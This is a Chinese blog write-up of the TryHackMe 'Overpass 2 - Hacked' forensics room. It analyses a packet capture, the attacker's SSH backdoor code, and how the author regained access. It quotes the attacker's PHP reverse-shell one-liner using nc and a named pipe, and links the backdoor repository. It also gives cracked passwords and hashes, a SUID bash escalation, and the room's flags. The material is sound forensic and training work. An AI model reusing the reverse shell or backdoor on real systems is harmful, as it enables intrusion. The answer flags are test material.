tryhackme--Overpass 2 - Hacked

最新推荐文章于 2024-08-21 10:31:16 发布
最新推荐文章于 2024-08-21 10:31:16 发布
阅读量532 收藏
点赞数
分类专栏: tryhackme 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45414878/article/details/109509932
版权

tryhackme--Overpass 2 - Hacked


日常一篇博客~~~~

今天分享的是tryhackme的一道取证题。

Task 1 -Forensics - Analyse the PCAP

#1 What was the URL of the page they used to upload a reverse shell?

查看http数据包,我们从请求和响应可以知道攻击者的ip:192.168.170.145,服务器的ip:192.168.170.159,并且/development/目录上还有一个upload.php,故答案

/development/

在这里插入图片描述

#2 What payload did the attacker use to gain access?

搜索关键字符,发现payload.php,TCP追踪流查看具体发包数据

在这里插入图片描述
攻击者利用upload.php新上传了一个payload.php,从内容上看是一个反弹shell
在这里插入图片描述

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

#3 What password did the attacker use to privesc?

继续查看该payload执行了什么命令,TCP追踪流,

在这里插入图片描述
该用户从www切换到james用户,密码为:

whenevernoteartinstant

在这里插入图片描述

#4 How did the attacker establish persistence?

继续查看攻击者的攻击命令,发现james可以以任何用户执行任何命令,这个属于配置上的错误。往下看攻击者先是看了/etc/passwd文件,再从github上面下载了一个ssh后门并安装执行。
在这里插入图片描述

https://github.com/NinjaJc01/ssh-backdoor

#5 Using the fasttrack wordlist, how many of the system passwords were crackable?

该服务器一共有5个用户,攻击者现在已经知道james用户的密码,只需破解剩下四个用户的密码即可,在kali使用john爆破也可以。
在这里插入图片描述
在这里插入图片描述

4

Task 2 Research - Analyse the code

#1 What’s the default hash for the backdoor?

查看mian.go
在这里插入图片描述

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

#2 What’s the hardcoded salt for the backdoor?

求该hash算法的盐
在这里插入图片描述

1c362db832f3f864c8c2fe05f2002a05

#3 What was the hash that the attacker used? - go back to the PCAP for this!

在这里插入图片描述

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

#4 Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

通过算法我们可以知道密码加盐加密成hash,即

SHA512(password + '1c362db832f3f864c8c2fe05f2002a05') = '6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed'

在这里插入图片描述
接下来我们用hashcat爆破密码

在这里插入图片描述

在这里插入图片描述

november16

Task 3 Attack - Get back in!

#1 The attacker defaced the website. What message did they leave as a heading?

访问http服务
在这里插入图片描述

H4ck3d by CooctusClan

#3 What’s the user flag?

用ssh后门登录服务器,在james在家目录找到user.txt

在这里插入图片描述

在这里插入图片描述

thm{d119b4fa8c497ddb0525f7ad200e6567}

#3 What’s the root flag?

发现一个可疑的suid文件,/home/james/.suid_bash
在这里插入图片描述
bash命令的提权方法,不过这个是二进制文件直接执行就好了。
在这里插入图片描述

执行拿到flag
在这里插入图片描述

thm{d53b2684f169360bb9606c333873144d}

ps:

个人站点博客:XingHe,欢迎来踩~

XingHe_0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
tryhackme
03-08
tryhackme
tryhackme--Overpass
qq_45414878的博客
11-16 432
tryhackmeOverpass 用nmap扫描主机,因为前面我已经简单扫过开放的端口了,所以我现在直接放上详细扫描的贴图和命令 nmap -T4 -sS -sV 10.10.220.203 -sC -p 22,80 扫描得到的目录 各种扫描,注入,爆破都试过了,也没有历史漏洞,看了wp才知道是js代码逻辑漏洞,这方面练的太少了,以至于没有找到切入点 async function login() { const usernameBox = document.querySelector("
Tryhackme-Overpass
个人博客
09-06 1079
Overpass 文章目录OverpassOverpassTask1 OverpassOverpass 2 - Hackedtask1 Forensics - Analyse the PCAPtask2 Research - Analyse the codetask3 Attack - Get back in!Overpass 3-HostingTask1 Overpass3 - Adventures in Hosting Overpass Task1 Overpass nmap扫描,靶机开启22-ssh
THM靶机overpass2-hacked流量分析溯源初体验
weixin_43738494的博客
06-23 194
发现其中有命令执行,推测是一个反弹shell,未加密,所以不太可能是msf或者其它c2的shell,只是一个普通的nc shell或者bash shell。会发现所有密码均已经失效,狡猾的hacker修改了所有的密码。进去之后会发现james的密码已经失效了,ssh的密码和原来的旧密码都没有用,所以这时候需要尝试横向一下。在下面发现对方使用的hash,破解这个hash就可以得到对方的常用(?看到最后一行的 /home/james/.suid_bash,相当可疑。
Tryhackme-Advanced Exploitation
个人博客
08-24 336
Advanced Exploitation 文章目录Advanced ExploitationDaily BugleTask1 DeployTask2 Obtain user and rootTask3 CreditsOverpass 2 - Hackedtask1 Forensics - Analyse the PCAPtask2 Research - Analyse the codetask3 Attack - Get back in!RelevantTask1 Pre-Engagement Brie
overpass-turbo:使用Overpass API的OpenStreetMap的基于Web的数据挖掘工具
05-02
入门只需将浏览器指向并开始运行您的Overpass查询即可。 有关立交桥涡轮的更多信息,请参见 。正在翻译使用平台管理翻译。 注册后,您可以进入,选择一种语言,然后单击“立即翻译”以开始翻译。 如果您的语言目前不...
overpass-api-python-wrapper:OpenStreetMap Overpass API的Python绑定
05-05
API () API构造函数采用几个参数,所有参数都是可选的:endpoint 默认端点是https://overpass-api.de/api/interpreter但是您可以传入另一个实例: api = overpass . API ( endpoint = ...
docker-overpass-api:Docker Overpass API
05-25
docker-overpass-api 适用于OpenStreetMap Docker。 构建Docker映像 下载以bzip格式压缩的XML格式的OSM文件,并另存为planet.osm.bz2 。 是一个很好的资源。 curl -o planet.osm.bz2 ...
workshop-geocj2015-overpass
06-03
研讨会 - 立交桥 API - geo-spatial.org Cluj 2015
nim-overpass:Nim的OpenStreetMap Overpass API库
02-02
**nim-overpass:Nim的OpenStreetMap Overpass API库** `nim-overpass` 是一个用Nim编程...通过阅读nim-overpass的源代码(例如在`nim-overpass-master`目录中),可以深入学习如何使用这个库以及Nim语言的更多细节。
TryHackMe-进攻性渗透测试-13_AD_横向移动和旋转
M1n9K1n9的博客
12-24 654
简而言之,横向移动是攻击者用来在网络中移动的一组技术。一旦攻击者获得了对网络第一台计算机的访问权限,移动就是必不可少的,原因有很多,包括: - 实现我们作为攻击者的目标 - 绕过现有的网络限制 - 建立额外的网络入口点 - 制造混乱并避免检测。虽然许多网络杀伤链将横向移动作为线性过程中的额外步骤,但它实际上是循环的一部分。在此周期中,我们使用任何可用的凭据来执行横向移动,从而使我们能够访问新计算机,在这些机器中,我们可以提升权限并在可能的情况下提取凭据。使用新发现的凭据,循环再次开始。
kali系统自带wordlist
小能猫的博客
12-05 1387
> Executing “cd /usr/share/wordlists && ls -l” 总用量 52108 lrwxrwxrwx 1 root root 25 7月 16 22:43 dirb -> /usr/share/dirb/wordlists lrwxrwxrwx 1 root root 30 7月 16 22:43 dirbuster -> /usr/share/dirbuster/wordlists lrwxrwxrwx 1 r...
TryHackMe学习笔记-The Cod Caper
网安星空
12-17 1397
TryHackMe靶场,联系SQL注入、命令执行等常见漏洞和基本的缓冲区溢出提权
TryHackMe | Blue Writeup (超干货详细msf渗透使用指南)
qq_25755011的博客
02-04 6664
因为给师弟师妹布置了这个任务作为假期渗透作业,是个对ms17_010漏洞利用的学习,而且网上中文的writeup很少(好像直接没有),所以写一篇Writeup记录一下。刚好也是一个相对完整的msf使用介绍,如有错误的地方欢迎各位师傅讨论指出 tryhackme是个很好的外网网络攻防学习平台,不用VPN也可以正常使用只是稍微有点卡,各位师傅有兴趣也可以去玩一玩。这里把这题的题目链接放给大家 TryHackMe | Blue 前期准备 kali Linux (仅用到msf框架与nmap) openvpn与.
AI安全-文生图
深度安全实验室
08-15 420
AI安全-文生图
探索802.1X:构筑安全网络的认证之盾
XINERTEL的博客
08-21 670
首先,让我们了解一下什么是802.1x。802.1x是一个基于端口的网络访问控制机制,由IEEE(电气电子工程师学会)开发,属于IEEE 802.1标准家族。它的主要作用是通过认证管理用户和设备对网络的访问权限。更通俗地说,802.1x就像是网络的门卫,负责检查每一个试图进入网络的设备或用户的身份,只有通过认证的合法用户才能进入。这不仅可以防止未授权的设备接入,还可以确保网络的安全和稳定。
CISAW安全集成和别的类型有什么区别
最新发布
2402_84109700的博客
08-21 123
对于CISAW安全运维方向,申请人须通过相应的考试,并且满足以下任一条件:具有硕士及以上学位并有2年信息安全相关工作经验,其中至少1年与安全运维相关;其次,CISAW的安全集成方向侧重于评估申请人在信息系统安全集成方面的基础知识和技能的掌握程度,以及运用这些知识分析和解决安全集成问题的能力。- 对于CISAW安全集成方向,申请人同样需要通过相应考试,并满足类似的工作经验要求,但针对的是安全集成领域的专业经验。- 对于CISAW安全管理方向,报名条件与前两者相似,但侧重于风险管理专业方向的相关工作经验。
如何选择较为安全的第三方依赖版本?
极客星云-CSDN博客
08-16 182
本篇博文分享如何选择较为安全的第三方依赖版本的方法。
overpass turbo使用
10-17
Overpass Turbo是一个在线的地理信息系统工具,用于查询和可视化OpenStreetMap(开放街图)的数据。它通过使用Overpass API(一种基于HTTP的接口)来获取OpenStreetMap的数据,并以交互式和可视化的方式呈现查询结果。 使用Overpass Turbo,我们可以执行各种查询操作,以获取我们需要的地理数据。比如,我们可以根据地理位置、标签、关键词等条件来查询OpenStreetMap中的点、线、面等地理要素。这些查询可以是简单的,比如查找某个特定地点的信息,也可以是复杂的,比如查找某个区域内特定类型的设施。 Overpass Turbo提供了一个直观友好的用户界面,让我们可以轻松地构建查询并实时预览查询结果。我们可以使用简单的操作来缩放、平移地图,以便更好地查看查询结果。此外,Overpass Turbo还提供了一些功能强大的过滤器,可以帮助我们根据特定的标签和属性来筛选查询结果,从而更好地满足我们的需求。 除了查询和可视化功能,Overpass Turbo还提供了一些其他实用的功能。例如,我们可以将查询结果导出为GeoJSON、KML等格式,方便我们在其他地理信息系统中使用。我们还可以保存和分享我们的查询和可视化结果,以便与他人合作或记录我们的工作。 总的来说,Overpass Turbo是一个功能强大且易于使用的工具,可以帮助我们查询和可视化OpenStreetMap的数据。无论是专业的地理信息系统专家还是普通用户,都可以通过使用Overpass Turbo来满足他们的地理信息需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值